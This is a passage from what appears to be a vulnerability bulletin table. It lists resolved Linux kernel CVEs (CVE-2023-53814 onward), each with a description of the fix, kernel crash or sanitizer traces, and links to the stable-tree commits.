| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: PCI: Fix dropping valid root bus resources with .end = zero On r8a7791/koelsch: kmemleak: 1 new suspected memory leaks (see /sys/kernel/debug/kmemleak) # cat /sys/kernel/debug/kmemleak unreferenced object 0xc3a34e00 (size 64): comm "swapper/0", pid 1, jiffies 4294937460 (age 199.080s) hex dump (first 32 bytes): b4 5d 81 f0 b4 5d 81 f0 c0 b0 a2 c3 00 00 00 00 .]...].......... 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ backtrace: [<fe3aa979>] __kmalloc+0xf0/0x140 [<34bd6bc0>] resource_list_create_entry+0x18/0x38 [<767046bc>] pci_add_resource_offset+0x20/0x68 [<b3f3edf2>] devm_of_pci_get_host_bridge_resources.constprop.0+0xb0/0x390 When coalescing two resources for a contiguous aperture, the second resource is enlarged to cover the full contiguous range, while the first resource is marked invalid. This invalidation is done by clearing the flags, start, and end members. When adding the initial resources to the bus later, invalid resources are skipped. Unfortunately, the check for an invalid resource considers only the end member, causing false positives. E.g. on r8a7791/koelsch, root bus resource 0 ("bus 00") is skipped, and no longer registered with pci_bus_insert_busn_res() (causing the memory leak), nor printed: pci-rcar-gen2 ee090000.pci: host bridge /soc/pci@ee090000 ranges: pci-rcar-gen2 ee090000.pci: MEM 0x00ee080000..0x00ee08ffff -> 0x00ee080000 pci-rcar-gen2 ee090000.pci: PCI: revision 11 pci-rcar-gen2 ee090000.pci: PCI host bridge to bus 0000:00 -pci_bus 0000:00: root bus resource [bus 00] pci_bus 0000:00: root bus resource [mem 0xee080000-0xee08ffff] Fix this by only skipping resources where all of the flags, start, and end members are zero. | 2025-12-09 | not yet calculated | CVE-2023-53814 | https://git.kernel.org/stable/c/e4af080f3ef6a65b0d702988c2471a47c9ae2cc0 https://git.kernel.org/stable/c/fe6a1fbe83f5b23d7db93596b793561230f06b40 https://git.kernel.org/stable/c/7e6f2714d93cdf977b6124a80af2cf0e14e2d407 https://git.kernel.org/stable/c/9d8ba74a181b1c81def21168795ed96cbe6f05ed |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: posix-timers: Prevent RT livelock in itimer_delete() itimer_delete() has a retry loop when the timer is concurrently expired. On non-RT kernels this just spin-waits until the timer callback has completed, except for posix CPU timers which have HAVE_POSIX_CPU_TIMERS_TASK_WORK enabled. In that case and on RT kernels the existing task could live lock when preempting the task which does the timer delivery. Replace spin_unlock() with an invocation of timer_wait_running() to handle it the same way as the other retry loops in the posix timer code. | 2025-12-09 | not yet calculated | CVE-2023-53815 | https://git.kernel.org/stable/c/f1be1ed32daa053484222f7f9beb2b16c624dffd https://git.kernel.org/stable/c/0670c4c567b27bd8f999a943028f4fe60d1a1106 https://git.kernel.org/stable/c/e7aff15ba29ba4b3052786b1636fa5c4aa39e179 https://git.kernel.org/stable/c/f9bd298e3e4d3fd6e19f017789a42d0f332cd555 https://git.kernel.org/stable/c/c1968bb8a28625cc95d2ad3ca872ab98c9c36d59 https://git.kernel.org/stable/c/9d9e522010eb5685d8b53e8a24320653d9d4cbbf |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/amdkfd: fix potential kgd_mem UAFs kgd_mem pointers returned by kfd_process_device_translate_handle are only guaranteed to be valid while p->mutex is held. As soon as the mutex is unlocked, another thread can free the BO. | 2025-12-09 | not yet calculated | CVE-2023-53816 | https://git.kernel.org/stable/c/5045360f3bb62ccd4f87202e33489f71f8bbc3fc https://git.kernel.org/stable/c/5ca14fb5552ac13a2402d306c0bd2379a71610ff https://git.kernel.org/stable/c/9da050b0d9e04439d225a2ec3044af70cdfb3933 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: crypto: lib/mpi - avoid null pointer deref in mpi_cmp_ui() During NVMeTCP Authentication a controller can trigger a kernel oops by specifying the 8192 bit Diffie Hellman group and passing a correctly sized, but zeroed Diffie Hellamn value. mpi_cmp_ui() was detecting this if the second parameter was 0, but 1 is passed from dh_is_pubkey_valid(). This causes the null pointer u->d to be dereferenced towards the end of mpi_cmp_ui() | 2025-12-09 | not yet calculated | CVE-2023-53817 | https://git.kernel.org/stable/c/fde791e8a96a64ea7b0ad2440e43586447a209c6 https://git.kernel.org/stable/c/ae63e84ffda74267bf7277c38415ba38389229a0 https://git.kernel.org/stable/c/61f5453e9706e99713825594e0c8f9031485fb5f https://git.kernel.org/stable/c/0fc7147c694394f8a8cbc19570c6bc918cac0906 https://git.kernel.org/stable/c/67589d247909043e94d2dd5fb590958e0f99d58d https://git.kernel.org/stable/c/d3ad023a39f1127dcfd331c562673355dc078650 https://git.kernel.org/stable/c/12ac013ad7ff0df066451e825801d805095b3776 https://git.kernel.org/stable/c/9e47a758b70167c9301d2b44d2569f86c7796f2d |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ARM: zynq: Fix refcount leak in zynq_early_slcr_init of_find_compatible_node() returns a node pointer with refcount incremented, we should use of_node_put() on error path. Add missing of_node_put() to avoid refcount leak. | 2025-12-09 | not yet calculated | CVE-2023-53818 | https://git.kernel.org/stable/c/f00bc6727adf840eb208700ea27cda4f3742629d https://git.kernel.org/stable/c/351b7e93d02b50b2faae2d4bda28e16a8389cbb7 https://git.kernel.org/stable/c/ede0334bf4df360f4f9446075cffbbb3bc54d0b6 https://git.kernel.org/stable/c/227f8c1c5c4b3d131b66e57e58d38054f441b915 https://git.kernel.org/stable/c/1cc12d10d13ae5ad8d3f7432a4c0156d221fc99b https://git.kernel.org/stable/c/e43a06c73be4b93d308f0df809ee0023b7c37b54 https://git.kernel.org/stable/c/4c22ee805202087c2553c9175968e9e922d75bc1 https://git.kernel.org/stable/c/9eedb910a3be0005b88c696a8552c0d4c9937cd4 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: amdgpu: validate offset_in_bo of drm_amdgpu_gem_va This is motivated by OOB access in amdgpu_vm_update_range when offset_in_bo+map_size overflows. v2: keep the validations in amdgpu_vm_bo_map v3: add the validations to amdgpu_vm_bo_map/amdgpu_vm_bo_replace_map rather than to amdgpu_gem_va_ioctl | 2025-12-09 | not yet calculated | CVE-2023-53819 | https://git.kernel.org/stable/c/82aace80cfaab778245bd2f9e31b67953725e4d0 https://git.kernel.org/stable/c/d83c337e654d58d3edd15a2ae76e87dc601c07d9 https://git.kernel.org/stable/c/968e27fd037ec4732068820a9b9836eccc0e0a12 https://git.kernel.org/stable/c/4300a47e4017c9febb60ffa7d39723eeaed00f2b https://git.kernel.org/stable/c/b10db1d2137415e5e7f9706d96cfe77539c499d4 https://git.kernel.org/stable/c/f015aadc0d973047f49526a127e900c488d4e425 https://git.kernel.org/stable/c/bc6dbf34dc4fb639522f3e8e66ef05997c0441ee https://git.kernel.org/stable/c/9f0bcf49e9895cb005d78b33a5eebfa11711b425 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: loop: loop_set_status_from_info() check before assignment In loop_set_status_from_info(), lo->lo_offset and lo->lo_sizelimit should be checked before reassignment, because if an overflow error occurs, the original correct value will be changed to the wrong value, and it will not be changed back. More, the original patch did not solve the problem, the value was set and ioctl returned an error, but the subsequent io used the value in the loop driver, which still caused an alarm: loop_handle_cmd do_req_filebacked loff_t pos = ((loff_t) blk_rq_pos(rq) << 9) + lo->lo_offset; lo_rw_aio cmd->iocb.ki_pos = pos | 2025-12-09 | not yet calculated | CVE-2023-53820 | https://git.kernel.org/stable/c/832580af82ace363205039a8e7c4ef04552ccc1a https://git.kernel.org/stable/c/861021710bba9dfa0749a3c209a6c1773208b1f1 https://git.kernel.org/stable/c/c79a924ed6afac1708dfd370ba66bcf6a852ced6 https://git.kernel.org/stable/c/3e7d0968203d668af6036b9f9199c7b62c8a3581 https://git.kernel.org/stable/c/4be26d553a3f1d4f54f25353d1496c562002126d https://git.kernel.org/stable/c/258809bf22bf71d53247856f374f2b1d055f2fd4 https://git.kernel.org/stable/c/9f6ad5d533d1c71e51bdd06a5712c4fbc8768dfa |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ip6_vti: fix slab-use-after-free in decode_session6 When ipv6_vti device is set to the qdisc of the sfb type, the cb field of the sent skb may be modified during enqueuing. Then, slab-use-after-free may occur when ipv6_vti device sends IPv6 packets. The stack information is as follows: BUG: KASAN: slab-use-after-free in decode_session6+0x103f/0x1890 Read of size 1 at addr ffff88802e08edc2 by task swapper/0/0 CPU: 0 PID: 0 Comm: swapper/0 Not tainted 6.4.0-next-20230707-00001-g84e2cad7f979 #410 Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.14.0-1.fc33 04/01/2014 Call Trace: <IRQ> dump_stack_lvl+0xd9/0x150 print_address_description.constprop.0+0x2c/0x3c0 kasan_report+0x11d/0x130 decode_session6+0x103f/0x1890 __xfrm_decode_session+0x54/0xb0 vti6_tnl_xmit+0x3e6/0x1ee0 dev_hard_start_xmit+0x187/0x700 sch_direct_xmit+0x1a3/0xc30 __qdisc_run+0x510/0x17a0 __dev_queue_xmit+0x2215/0x3b10 neigh_connected_output+0x3c2/0x550 ip6_finish_output2+0x55a/0x1550 ip6_finish_output+0x6b9/0x1270 ip6_output+0x1f1/0x540 ndisc_send_skb+0xa63/0x1890 ndisc_send_rs+0x132/0x6f0 addrconf_rs_timer+0x3f1/0x870 call_timer_fn+0x1a0/0x580 expire_timers+0x29b/0x4b0 run_timer_softirq+0x326/0x910 __do_softirq+0x1d4/0x905 irq_exit_rcu+0xb7/0x120 sysvec_apic_timer_interrupt+0x97/0xc0 </IRQ> Allocated by task 9176: kasan_save_stack+0x22/0x40 kasan_set_track+0x25/0x30 __kasan_slab_alloc+0x7f/0x90 kmem_cache_alloc_node+0x1cd/0x410 kmalloc_reserve+0x165/0x270 __alloc_skb+0x129/0x330 netlink_sendmsg+0x9b1/0xe30 sock_sendmsg+0xde/0x190 ____sys_sendmsg+0x739/0x920 ___sys_sendmsg+0x110/0x1b0 __sys_sendmsg+0xf7/0x1c0 do_syscall_64+0x39/0xb0 entry_SYSCALL_64_after_hwframe+0x63/0xcd Freed by task 9176: kasan_save_stack+0x22/0x40 kasan_set_track+0x25/0x30 kasan_save_free_info+0x2b/0x40 ____kasan_slab_free+0x160/0x1c0 slab_free_freelist_hook+0x11b/0x220 kmem_cache_free+0xf0/0x490 skb_free_head+0x17f/0x1b0 skb_release_data+0x59c/0x850 consume_skb+0xd2/0x170 netlink_unicast+0x54f/0x7f0 netlink_sendmsg+0x926/0xe30 sock_sendmsg+0xde/0x190 ____sys_sendmsg+0x739/0x920 ___sys_sendmsg+0x110/0x1b0 __sys_sendmsg+0xf7/0x1c0 do_syscall_64+0x39/0xb0 entry_SYSCALL_64_after_hwframe+0x63/0xcd The buggy address belongs to the object at ffff88802e08ed00 which belongs to the cache skbuff_small_head of size 640 The buggy address is located 194 bytes inside of freed 640-byte region [ffff88802e08ed00, ffff88802e08ef80) As commit f855691975bb ("xfrm6: Fix the nexthdr offset in _decode_session6.") showed, xfrm_decode_session was originally intended only for the receive path. IP6CB(skb)->nhoff is not set during transmission. Therefore, set the cb field in the skb to 0 before sending packets. | 2025-12-09 | not yet calculated | CVE-2023-53821 | https://git.kernel.org/stable/c/0f0ab8d52ee0062b28367dea23c29e254a26d7db https://git.kernel.org/stable/c/fa6c6c04f6c9b21b315023f487e5a07ae7fcf647 https://git.kernel.org/stable/c/eb47e612e59c358c3968a92f90dd36c78c9a2106 https://git.kernel.org/stable/c/ec23b25e5687dbd644c0f57bcb6af22dd5a6dd36 https://git.kernel.org/stable/c/a1639a82ce14af76b6419778d343ccbff86ee626 https://git.kernel.org/stable/c/55ad2309205cc00c585344374c7472420e1b2c12 https://git.kernel.org/stable/c/c070688bfbe7759e61e697e421b2a331b0dd74bc https://git.kernel.org/stable/c/9fd41f1ba638938c9a1195d09bc6fa3be2712f25 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: wifi: ath11k: Ignore frags from uninitialized peer in dp. When max virtual ap interfaces are configured in all the bands with ACS and hostapd restart is done every 60s, a crash is observed at random times. In this certain scenario, a fragmented packet is received for self peer, for which rx_tid and rx_frags are not initialized in datapath. While handling this fragment, crash is observed as the rx_frag list is uninitialised and when we walk in ath11k_dp_rx_h_sort_frags, skb null leads to exception. To address this, before processing received fragments we check dp_setup_done flag is set to ensure that peer has completed its dp peer setup for fragment queue, else ignore processing the fragments. Call trace: ath11k_dp_process_rx_err+0x550/0x1084 [ath11k] ath11k_dp_service_srng+0x70/0x370 [ath11k] 0xffffffc009693a04 __napi_poll+0x30/0xa4 net_rx_action+0x118/0x270 __do_softirq+0x10c/0x244 irq_exit+0x64/0xb4 __handle_domain_irq+0x88/0xac gic_handle_irq+0x74/0xbc el1_irq+0xf0/0x1c0 arch_cpu_idle+0x10/0x18 do_idle+0x104/0x248 cpu_startup_entry+0x20/0x64 rest_init+0xd0/0xdc arch_call_rest_init+0xc/0x14 start_kernel+0x480/0x4b8 Code: f9400281 f94066a2 91405021 b94a0023 (f9406401) Tested-on: IPQ8074 hw2.0 AHB WLAN.HK.2.7.0.1-01744-QCAHKSWPL_SILICONZ-1 | 2025-12-09 | not yet calculated | CVE-2023-53822 | https://git.kernel.org/stable/c/e78526a06b53718bfc1dfff37864c7760e41f8ec https://git.kernel.org/stable/c/41efc47f5bc53e63461579e206adc17c4452ab6e https://git.kernel.org/stable/c/a06bfb3c9f69f303692cdae87bc0899d2ae8b2a6 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: block/rq_qos: protect rq_qos apis with a new lock commit 50e34d78815e ("block: disable the elevator int del_gendisk") move rq_qos_exit() from disk_release() to del_gendisk(), this will introduce some problems: 1) If rq_qos_add() is triggered by enabling iocost/iolatency through cgroupfs, then it can concurrent with del_gendisk(), it's not safe to write 'q->rq_qos' concurrently. 2) Activate cgroup policy that is relied on rq_qos will call rq_qos_add() and blkcg_activate_policy(), and if rq_qos_exit() is called in the middle, null-ptr-dereference will be triggered in blkcg_activate_policy(). 3) blkg_conf_open_bdev() can call blkdev_get_no_open() first to find the disk, then if rq_qos_exit() from del_gendisk() is done before rq_qos_add(), then memory will be leaked. This patch add a new disk level mutex 'rq_qos_mutex': 1) The lock will protect rq_qos_exit() directly. 2) For wbt that doesn't relied on blk-cgroup, rq_qos_add() can only be called from disk initialization for now because wbt can't be destructed until rq_qos_exit(), so it's safe not to protect wbt for now. Hoever, in case that rq_qos dynamically destruction is supported in the furture, this patch also protect rq_qos_add() from wbt_init() directly, this is enough because blk-sysfs already synchronize writers with disk removal. 3) For iocost and iolatency, in order to synchronize disk removal and cgroup configuration, the lock is held after blkdev_get_no_open() from blkg_conf_open_bdev(), and is released in blkg_conf_exit(). In order to fix the above memory leak, disk_live() is checked after holding the new lock. | 2025-12-09 | not yet calculated | CVE-2023-53823 | https://git.kernel.org/stable/c/16398b4638b5cd8c1dc95fc940a1591a801d53ce https://git.kernel.org/stable/c/a13bd91be22318768d55470cbc0b0f4488ef9edf |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: netlink: annotate lockless accesses to nlk->max_recvmsg_len syzbot reported a data-race in data-race in netlink_recvmsg() [1] Indeed, netlink_recvmsg() can be run concurrently, and netlink_dump() also needs protection. [1] BUG: KCSAN: data-race in netlink_recvmsg / netlink_recvmsg read to 0xffff888141840b38 of 8 bytes by task 23057 on cpu 0: netlink_recvmsg+0xea/0x730 net/netlink/af_netlink.c:1988 sock_recvmsg_nosec net/socket.c:1017 [inline] sock_recvmsg net/socket.c:1038 [inline] __sys_recvfrom+0x1ee/0x2e0 net/socket.c:2194 __do_sys_recvfrom net/socket.c:2212 [inline] __se_sys_recvfrom net/socket.c:2208 [inline] __x64_sys_recvfrom+0x78/0x90 net/socket.c:2208 do_syscall_x64 arch/x86/entry/common.c:50 [inline] do_syscall_64+0x41/0xc0 arch/x86/entry/common.c:80 entry_SYSCALL_64_after_hwframe+0x63/0xcd write to 0xffff888141840b38 of 8 bytes by task 23037 on cpu 1: netlink_recvmsg+0x114/0x730 net/netlink/af_netlink.c:1989 sock_recvmsg_nosec net/socket.c:1017 [inline] sock_recvmsg net/socket.c:1038 [inline] ____sys_recvmsg+0x156/0x310 net/socket.c:2720 ___sys_recvmsg net/socket.c:2762 [inline] do_recvmmsg+0x2e5/0x710 net/socket.c:2856 __sys_recvmmsg net/socket.c:2935 [inline] __do_sys_recvmmsg net/socket.c:2958 [inline] __se_sys_recvmmsg net/socket.c:2951 [inline] __x64_sys_recvmmsg+0xe2/0x160 net/socket.c:2951 do_syscall_x64 arch/x86/entry/common.c:50 [inline] do_syscall_64+0x41/0xc0 arch/x86/entry/common.c:80 entry_SYSCALL_64_after_hwframe+0x63/0xcd value changed: 0x0000000000000000 -> 0x0000000000001000 Reported by Kernel Concurrency Sanitizer on: CPU: 1 PID: 23037 Comm: syz-executor.2 Not tainted 6.3.0-rc4-syzkaller-00195-g5a57b48fdfcb #0 Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 03/02/2023 | 2025-12-09 | not yet calculated | CVE-2023-53824 | https://git.kernel.org/stable/c/05c9e3fc93b02d18c3ab258d43350a6d44b40bbd https://git.kernel.org/stable/c/7cff4103be7c402ecc3e7bf8f95a64089e3c91b8 https://git.kernel.org/stable/c/e3bcf2a77060bea4d8d09cb09d92c7056f07df5a https://git.kernel.org/stable/c/fc4ba13013ddaea8b11b88fd52b35449e2d9cf85 https://git.kernel.org/stable/c/a1865f2e7d10dde00d35a2122b38d2e469ae67ed |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: kcm: Fix error handling for SOCK_DGRAM in kcm_sendmsg(). syzkaller found a memory leak in kcm_sendmsg(), and commit c821a88bd720 ("kcm: Fix memory leak in error path of kcm_sendmsg()") suppressed it by updating kcm_tx_msg(head)->last_skb if partial data is copied so that the following sendmsg() will resume from the skb. However, we cannot know how many bytes were copied when we get the error. Thus, we could mess up the MSG_MORE queue. When kcm_sendmsg() fails for SOCK_DGRAM, we should purge the queue as we do so for UDP by udp_flush_pending_frames(). Even without this change, when the error occurred, the following sendmsg() resumed from a wrong skb and the queue was messed up. However, we have yet to get such a report, and only syzkaller stumbled on it. So, this can be changed safely. Note this does not change SOCK_SEQPACKET behaviour. | 2025-12-09 | not yet calculated | CVE-2023-53825 | https://git.kernel.org/stable/c/21b467735b0888a8daa048f83d3b9b50fdab71ce https://git.kernel.org/stable/c/d4b8f380b0a041ee6a84fdac14127d8fe1dcad7b https://git.kernel.org/stable/c/1ce8362b4ac6b8e65fd04a22ea37ec776ee1ec5b https://git.kernel.org/stable/c/2e18493c421428a936946c452461b8e979088f17 https://git.kernel.org/stable/c/55d2e7c1ab8eaa7b62575b8a4194132795d1f9fc https://git.kernel.org/stable/c/e5b28ce127a690f3acc49a6a342e6c9442c9edd6 https://git.kernel.org/stable/c/992b2ac783aad360b98ed9d4686e86176a20f6f1 https://git.kernel.org/stable/c/a22730b1b4bf437c6bbfdeff5feddf54be4aeada |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ubi: Fix UAF wear-leveling entry in eraseblk_count_seq_show() Wear-leveling entry could be freed in error path, which may be accessed again in eraseblk_count_seq_show(), for example: __erase_worker eraseblk_count_seq_show wl = ubi->lookuptbl[*block_number] if (wl) wl_entry_destroy ubi->lookuptbl[e->pnum] = NULL kmem_cache_free(ubi_wl_entry_slab, e) erase_count = wl->ec // UAF! Wear-leveling entry updating/accessing in ubi->lookuptbl should be protected by ubi->wl_lock, fix it by adding ubi->wl_lock to serialize wl entry accessing between wl_entry_destroy() and eraseblk_count_seq_show(). Fetch a reproducer in [Link]. | 2025-12-09 | not yet calculated | CVE-2023-53826 | https://git.kernel.org/stable/c/3f9b63dfce44a7c3c095dd93d910408e07ab1845 https://git.kernel.org/stable/c/84250da1c63cb7d421a3b4812b5c2ce2e47d31a1 https://git.kernel.org/stable/c/1cb14c06d6035539ef4215c4ba0871aea71d7c38 https://git.kernel.org/stable/c/9d448dd6bcb61a508204b57ea1f454ba9bac2f24 https://git.kernel.org/stable/c/79548ccdd992707879b4b683b7251c58ddf26f12 https://git.kernel.org/stable/c/84253f3c2dad6be10d30c92626c763d9a9f512ad https://git.kernel.org/stable/c/a100de2974d208cfca032179b02ed4d1a0a7f143 https://git.kernel.org/stable/c/a240bc5c43130c6aa50831d7caaa02a1d84e1bce |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: Bluetooth: L2CAP: Fix use-after-free in l2cap_disconnect_{req,rsp} Similar to commit d0be8347c623 ("Bluetooth: L2CAP: Fix use-after-free caused by l2cap_chan_put"), just use l2cap_chan_hold_unless_zero to prevent referencing a channel that is about to be destroyed. | 2025-12-09 | not yet calculated | CVE-2023-53827 | https://git.kernel.org/stable/c/f2d38e77aa5f3effc143e7dd24da8acf02925958 https://git.kernel.org/stable/c/1351551aa9058e07a20a27a158270cf84fcde621 https://git.kernel.org/stable/c/c02421992505c95c7f3c9ad59ee35e22eac60988 https://git.kernel.org/stable/c/d9ba36c22a7bb09d6bac4cc2f243eff05da53f43 https://git.kernel.org/stable/c/ac6725a634f7e8c0330610a8527f20c730b61115 https://git.kernel.org/stable/c/348d446762e7c70778df8bafbdf3fa0df2123f58 https://git.kernel.org/stable/c/d82a439c3cfdb28aa7e82e2e849c5c4dd9fca284 https://git.kernel.org/stable/c/a2a9339e1c9deb7e1e079e12e27a0265aea8421a |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: Bluetooth: hci_sync: Avoid use-after-free in dbg for hci_add_adv_monitor() KSAN reports use-after-free in hci_add_adv_monitor(). While adding an adv monitor, hci_add_adv_monitor() calls -> msft_add_monitor_pattern() calls -> msft_add_monitor_sync() calls -> msft_le_monitor_advertisement_cb() calls in an error case -> hci_free_adv_monitor() which frees the *moniter. This is referenced by bt_dev_dbg() in hci_add_adv_monitor(). Fix the bt_dev_dbg() by using handle instead of monitor->handle. | 2025-12-09 | not yet calculated | CVE-2023-53828 | https://git.kernel.org/stable/c/81d8e9f59df63b8358751c1ffed9f1cf5c796909 https://git.kernel.org/stable/c/aafda69d4807f5edf3558c9534be9b911774e63a https://git.kernel.org/stable/c/8d66f7ced51cb924bc90278d6a0a26a52877271a https://git.kernel.org/stable/c/a2bcd2b63271a93a695fabbfbf459c603d956d48 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: f2fs: flush inode if atomic file is aborted Let's flush the inode being aborted atomic operation to avoid stale dirty inode during eviction in this call stack: f2fs_mark_inode_dirty_sync+0x22/0x40 [f2fs] f2fs_abort_atomic_write+0xc4/0xf0 [f2fs] f2fs_evict_inode+0x3f/0x690 [f2fs] ? sugov_start+0x140/0x140 evict+0xc3/0x1c0 evict_inodes+0x17b/0x210 generic_shutdown_super+0x32/0x120 kill_block_super+0x21/0x50 deactivate_locked_super+0x31/0x90 cleanup_mnt+0x100/0x160 task_work_run+0x59/0x90 do_exit+0x33b/0xa50 do_group_exit+0x2d/0x80 __x64_sys_exit_group+0x14/0x20 do_syscall_64+0x3b/0x90 entry_SYSCALL_64_after_hwframe+0x63/0xcd This triggers f2fs_bug_on() in f2fs_evict_inode: f2fs_bug_on(sbi, is_inode_flag_set(inode, FI_DIRTY_INODE)); This fixes the syzbot report: loop0: detected capacity change from 0 to 131072 F2FS-fs (loop0): invalid crc value F2FS-fs (loop0): Found nat_bits in checkpoint F2FS-fs (loop0): Mounted with checkpoint version = 48b305e4 ------------[ cut here ]------------ kernel BUG at fs/f2fs/inode.c:869! invalid opcode: 0000 [#1] PREEMPT SMP KASAN CPU: 0 PID: 5014 Comm: syz-executor220 Not tainted 6.4.0-syzkaller-11479-g6cd06ab12d1a #0 Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 05/27/2023 RIP: 0010:f2fs_evict_inode+0x172d/0x1e00 fs/f2fs/inode.c:869 Code: ff df 48 c1 ea 03 80 3c 02 00 0f 85 6a 06 00 00 8b 75 40 ba 01 00 00 00 4c 89 e7 e8 6d ce 06 00 e9 aa fc ff ff e8 63 22 e2 fd <0f> 0b e8 5c 22 e2 fd 48 c7 c0 a8 3a 18 8d 48 ba 00 00 00 00 00 fc RSP: 0018:ffffc90003a6fa00 EFLAGS: 00010293 RAX: 0000000000000000 RBX: 0000000000000001 RCX: 0000000000000000 RDX: ffff8880273b8000 RSI: ffffffff83a2bd0d RDI: 0000000000000007 RBP: ffff888077db91b0 R08: 0000000000000007 R09: 0000000000000000 R10: 0000000000000001 R11: 0000000000000001 R12: ffff888029a3c000 R13: ffff888077db9660 R14: ffff888029a3c0b8 R15: ffff888077db9c50 FS: 0000000000000000(0000) GS:ffff8880b9800000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 00007f1909bb9000 CR3: 00000000276a9000 CR4: 0000000000350ef0 Call Trace: <TASK> evict+0x2ed/0x6b0 fs/inode.c:665 dispose_list+0x117/0x1e0 fs/inode.c:698 evict_inodes+0x345/0x440 fs/inode.c:748 generic_shutdown_super+0xaf/0x480 fs/super.c:478 kill_block_super+0x64/0xb0 fs/super.c:1417 kill_f2fs_super+0x2af/0x3c0 fs/f2fs/super.c:4704 deactivate_locked_super+0x98/0x160 fs/super.c:330 deactivate_super+0xb1/0xd0 fs/super.c:361 cleanup_mnt+0x2ae/0x3d0 fs/namespace.c:1254 task_work_run+0x16f/0x270 kernel/task_work.c:179 exit_task_work include/linux/task_work.h:38 [inline] do_exit+0xa9a/0x29a0 kernel/exit.c:874 do_group_exit+0xd4/0x2a0 kernel/exit.c:1024 __do_sys_exit_group kernel/exit.c:1035 [inline] __se_sys_exit_group kernel/exit.c:1033 [inline] __x64_sys_exit_group+0x3e/0x50 kernel/exit.c:1033 do_syscall_x64 arch/x86/entry/common.c:50 [inline] do_syscall_64+0x39/0xb0 arch/x86/entry/common.c:80 entry_SYSCALL_64_after_hwframe+0x63/0xcd RIP: 0033:0x7f309be71a09 Code: Unable to access opcode bytes at 0x7f309be719df. RSP: 002b:00007fff171df518 EFLAGS: 00000246 ORIG_RAX: 00000000000000e7 RAX: ffffffffffffffda RBX: 00007f309bef7330 RCX: 00007f309be71a09 RDX: 000000000000003c RSI: 00000000000000e7 RDI: 0000000000000001 RBP: 0000000000000001 R08: ffffffffffffffc0 R09: 00007f309bef1e40 R10: 0000000000010600 R11: 0000000000000246 R12: 00007f309bef7330 R13: 0000000000000001 R14: 0000000000000000 R15: 0000000000000001 </TASK> Modules linked in: ---[ end trace 0000000000000000 ]--- RIP: 0010:f2fs_evict_inode+0x172d/0x1e00 fs/f2fs/inode.c:869 Code: ff df 48 c1 ea 03 80 3c 02 00 0f 85 6a 06 00 00 8b 75 40 ba 01 00 00 00 4c 89 e7 e8 6d ce 06 00 e9 aa fc ff ff e8 63 22 e2 fd <0f> 0b e8 5c 22 e2 fd 48 c7 c0 a8 3a 18 8d 48 ba 00 00 00 00 00 fc RSP: 0018:ffffc90003a6fa00 EFLAGS: 00010293 RAX: 0000000000000000 RBX: 0000000000 ---truncated--- | 2025-12-09 | not yet calculated | CVE-2023-53829 | https://git.kernel.org/stable/c/1c64dbe8fa3552a340bca6d7fa09468c16ed2a85 https://git.kernel.org/stable/c/bfa7853bb47fee0c17030b377c98cf4ede47ba33 https://git.kernel.org/stable/c/a3ab55746612247ce3dcaac6de66f5ffc055b9df |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: platform/x86: think-lmi: Fix memory leak when showing current settings When retriving a item string with tlmi_setting(), the result has to be freed using kfree(). In current_value_show() however, malformed item strings are not freed, causing a memory leak. Fix this by eliminating the early return responsible for this. | 2025-12-09 | not yet calculated | CVE-2023-53830 | https://git.kernel.org/stable/c/b9396d991abe8d1ac31a043274ab20b49f92c2e6 https://git.kernel.org/stable/c/9071525bfcb1f5674117dbed3eca0cd7b122813b https://git.kernel.org/stable/c/5f99014c19fa50a5719c0bb78143282632675893 https://git.kernel.org/stable/c/a3c4c053014585dcf20f4df954791b74d8a8afcd |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: read sk->sk_family once in sk_mc_loop() syzbot is playing with IPV6_ADDRFORM quite a lot these days, and managed to hit the WARN_ON_ONCE(1) in sk_mc_loop() We have many more similar issues to fix. WARNING: CPU: 1 PID: 1593 at net/core/sock.c:782 sk_mc_loop+0x165/0x260 Modules linked in: CPU: 1 PID: 1593 Comm: kworker/1:3 Not tainted 6.1.40-syzkaller #0 Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 07/26/2023 Workqueue: events_power_efficient gc_worker RIP: 0010:sk_mc_loop+0x165/0x260 net/core/sock.c:782 Code: 34 1b fd 49 81 c7 18 05 00 00 4c 89 f8 48 c1 e8 03 42 80 3c 20 00 74 08 4c 89 ff e8 25 36 6d fd 4d 8b 37 eb 13 e8 db 33 1b fd <0f> 0b b3 01 eb 34 e8 d0 33 1b fd 45 31 f6 49 83 c6 38 4c 89 f0 48 RSP: 0018:ffffc90000388530 EFLAGS: 00010246 RAX: ffffffff846d9b55 RBX: 0000000000000011 RCX: ffff88814f884980 RDX: 0000000000000102 RSI: ffffffff87ae5160 RDI: 0000000000000011 RBP: ffffc90000388550 R08: 0000000000000003 R09: ffffffff846d9a65 R10: 0000000000000002 R11: ffff88814f884980 R12: dffffc0000000000 R13: ffff88810dbee000 R14: 0000000000000010 R15: ffff888150084000 FS: 0000000000000000(0000) GS:ffff8881f6b00000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 0000000020000180 CR3: 000000014ee5b000 CR4: 00000000003506e0 DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400 Call Trace: <IRQ> 